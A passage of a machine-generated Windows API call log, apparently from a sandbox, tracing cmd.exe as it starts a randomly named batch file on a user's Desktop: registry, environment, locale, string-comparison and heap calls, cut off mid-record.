lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x4, lpData=0x3ae6a8*=0x0, lpcbData=0x3ae6a0*=0x4) returned 0x0 [0132.689] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x4, lpData=0x3ae6a8*=0x40, lpcbData=0x3ae6a0*=0x4) returned 0x0 [0132.689] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x4, lpData=0x3ae6a8*=0x40, lpcbData=0x3ae6a0*=0x4) returned 0x0 [0132.689] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x0, lpData=0x3ae6a8*=0x40, lpcbData=0x3ae6a0*=0x1000) returned 0x2 [0132.689] RegCloseKey (hKey=0x68) returned 0x0 [0132.689] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ae69c | out: phkResult=0x3ae69c*=0x68) returned 0x0 [0132.690] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x0, lpData=0x3ae6a8*=0x40, lpcbData=0x3ae6a0*=0x1000) returned 0x2 [0132.690] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x4, lpData=0x3ae6a8*=0x1, lpcbData=0x3ae6a0*=0x4) returned 0x0 [0132.690] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x0, lpData=0x3ae6a8*=0x1, lpcbData=0x3ae6a0*=0x1000) returned 0x2 [0132.690] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x4, lpData=0x3ae6a8*=0x0, lpcbData=0x3ae6a0*=0x4) returned 0x0 [0132.690] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x4, lpData=0x3ae6a8*=0x9, lpcbData=0x3ae6a0*=0x4) returned 0x0 [0132.690] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x4, lpData=0x3ae6a8*=0x9, lpcbData=0x3ae6a0*=0x4) returned 0x0 [0132.690] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x0, lpData=0x3ae6a8*=0x9, lpcbData=0x3ae6a0*=0x1000) returned 0x2 [0132.690] RegCloseKey (hKey=0x68) returned 0x0 [0132.690] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2af [0132.690] srand (_Seed=0x5f51e2af) [0132.690] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\"\"" [0132.690] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\"\"" [0132.691] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0132.691] GetProcessHeap () returned 0x440000 [0132.691] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x210) returned 0x454068 [0132.691] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x454070, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0132.692] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.692] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.692] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.692] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.692] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.692] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.692] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.692] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.692] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.692] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.692] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.692] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.692] GetProcessHeap () returned 0x440000 [0132.692] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x454b40 | out: hHeap=0x440000) returned 1 [0132.692] GetEnvironmentStringsW () returned 0x454280* [0132.692] GetProcessHeap () returned 0x440000 [0132.692] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xae2) returned 0x456be0 [0132.693] FreeEnvironmentStringsW (penv=0x454280) returned 1 [0132.693] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.693] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.693] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.693] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.693] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.693] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.693] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.693] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.693] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.693] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.693] GetProcessHeap () returned 0x440000 [0132.693] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x54) returned 0x4576d0 [0132.693] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3af468 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0132.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3af468, lpFilePart=0x3af464 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3af464*="Desktop") returned 0x25 [0132.693] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0132.694] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3af1e4 | out: lpFindFileData=0x3af1e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x453ee8 [0132.694] FindClose (in: hFindFile=0x453ee8 | out: hFindFile=0x453ee8) returned 1 [0132.694] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3af1e4 | out: lpFindFileData=0x3af1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x453ee8 [0132.694] FindClose (in: hFindFile=0x453ee8 | out: hFindFile=0x453ee8) returned 1 [0132.694] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0132.694] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3af1e4 | out: lpFindFileData=0x3af1e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x453ee8 [0132.694] FindClose (in: hFindFile=0x453ee8 | out: hFindFile=0x453ee8) returned 1 [0132.695] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0132.695] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0132.695] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0132.695] GetProcessHeap () returned 0x440000 [0132.695] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456be0 | out: hHeap=0x440000) returned 1 [0132.695] GetEnvironmentStringsW () returned 0x4560f0* [0132.695] GetProcessHeap () returned 0x440000 [0132.695] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb36) returned 0x457f30 [0132.695] FreeEnvironmentStringsW (penv=0x4560f0) returned 1 [0132.695] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0132.695] GetProcessHeap () returned 0x440000 [0132.695] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4576d0 | out: hHeap=0x440000) returned 1 [0132.695] GetProcessHeap () returned 0x440000 [0132.695] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400e) returned 0x458a70 [0132.696] GetProcessHeap () returned 0x440000 [0132.696] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe8) returned 0x454dc0 [0132.696] GetProcessHeap () returned 0x440000 [0132.696] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4008) returned 0x45ca88 [0132.696] GetProcessHeap () returned 0x440000 [0132.696] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4008) returned 0x460a98 [0132.697] GetProcessHeap () returned 0x440000 [0132.697] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458a70 | out: hHeap=0x440000) returned 1 [0132.697] GetConsoleOutputCP () returned 0x1b5 [0133.054] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0133.054] GetUserDefaultLCID () returned 0x409 [0133.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0133.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3af5a8, cchData=128 | out: lpLCData="0") returned 2 [0133.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3af5a8, cchData=128 | out: lpLCData="0") returned 2 [0133.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3af5a8, cchData=128 | out: lpLCData="1") returned 2 [0133.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0133.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0133.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0133.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0133.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0133.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0133.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0133.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0133.056] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0133.056] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0133.056] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0133.057] GetProcessHeap () returned 0x440000 [0133.057] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20c) returned 0x454eb0 [0133.057] GetConsoleTitleW (in: lpConsoleTitle=0x454eb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.058] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0133.058] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0133.058] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0133.058] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0133.059] GetProcessHeap () returned 0x440000 [0133.059] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x458a70 [0133.059] GetProcessHeap () returned 0x440000 [0133.059] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458a70 | out: hHeap=0x440000) returned 1 [0133.061] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0133.061] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0133.061] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0133.061] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0133.061] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0133.061] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0133.061] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0133.061] GetProcessHeap () returned 0x440000 [0133.061] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x58) returned 0x4550c8 [0133.061] GetProcessHeap () returned 0x440000 [0133.061] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x72) returned 0x450ee0 [0133.063] GetProcessHeap () returned 0x440000 [0133.063] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x78) returned 0x450f60 [0133.064] GetConsoleTitleW (in: lpConsoleTitle=0x3af2a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.065] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0133.065] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0133.065] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0133.065] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0133.065] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0133.066] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0133.066] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0133.066] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0133.066] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0133.066] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0133.066] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0133.066] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0133.066] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0133.067] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0133.067] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0133.067] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0133.067] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0133.067] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0133.067] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0133.067] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0133.067] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0133.067] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0133.067] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0133.067] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0133.067] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0133.067] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0133.067] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0133.067] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0133.068] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0133.068] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0133.068] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0133.068] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0133.068] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0133.068] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0133.068] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0133.068] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0133.068] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0133.068] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0133.068] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0133.068] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0133.068] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0133.068] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0133.069] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0133.069] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0133.069] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0133.069] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0133.069] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0133.069] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0133.069] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0133.069] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0133.069] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0133.069] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0133.069] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0133.069] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0133.069] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0133.069] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0133.069] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0133.069] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0133.069] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0133.069] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0133.069] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0133.069] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0133.069] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0133.069] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0133.070] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0133.070] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0133.070] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0133.070] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0133.070] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0133.070] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0133.070] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0133.070] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0133.070] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0133.070] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0133.070] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0133.070] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0133.070] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0133.070] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0133.070] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0133.070] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0133.070] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0133.070] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0133.070] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0133.070] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0133.070] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0133.070] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0133.070] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0133.071] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0133.071] GetProcessHeap () returned 0x440000 [0133.071] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x210) returned 0x455128 [0133.071] GetProcessHeap () returned 0x440000 [0133.071] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe2) returned 0x455340 [0133.073] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0133.073] GetProcessHeap () returned 0x440000 [0133.073] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x418) returned 0x4407f0 [0133.073] SetErrorMode (uMode=0x0) returned 0x0 [0133.073] SetErrorMode (uMode=0x1) returned 0x0 [0133.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x4407f8, lpFilePart=0x3aedc0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3aedc0*="Desktop") returned 0x25 [0133.073] SetErrorMode (uMode=0x0) returned 0x1 [0133.073] GetProcessHeap () returned 0x440000 [0133.073] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4407f0, Size=0x6e) returned 0x4407f0 [0133.073] GetProcessHeap () returned 0x440000 [0133.073] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4407f0) returned 0x6e [0133.073] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0133.073] GetProcessHeap () returned 0x440000 [0133.074] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x5a) returned 0x455430 [0133.074] GetProcessHeap () returned 0x440000 [0133.074] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa8) returned 0x455498 [0133.074] GetProcessHeap () returned 0x440000 [0133.074] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x455498, Size=0x5a) returned 0x455498 [0133.074] GetProcessHeap () returned 0x440000 [0133.074] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x455498) returned 0x5a [0133.074] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.074] GetProcessHeap () returned 0x440000 [0133.074] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe0) returned 0x455500 [0133.080] GetProcessHeap () returned 0x440000 [0133.080] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x455500, Size=0x76) returned 0x455500 [0133.080] GetProcessHeap () returned 0x440000 [0133.080] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x455500) returned 0x76 [0133.080] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0133.080] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x3aeb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3aeb5c) returned 0x455580 [0133.081] GetProcessHeap () returned 0x440000 [0133.081] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x14) returned 0x4555c0 [0133.081] FindClose (in: hFindFile=0x455580 | out: hFindFile=0x455580) returned 1 [0133.081] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0133.081] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0133.081] GetConsoleTitleW (in: lpConsoleTitle=0x3af034, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.082] GetProcessHeap () returned 0x440000 [0133.082] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x11c) returned 0x440868 [0133.082] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0133.083] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0133.083] IdentifyCodeAuthzLevelW () returned 0x1 [0133.093] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0133.093] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0133.094] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0133.094] CloseCodeAuthzLevel () returned 0x1 [0133.094] SetErrorMode (uMode=0x0) returned 0x0 [0133.094] SetErrorMode (uMode=0x1) returned 0x0 [0133.094] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x455130, lpFilePart=0x3aef20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 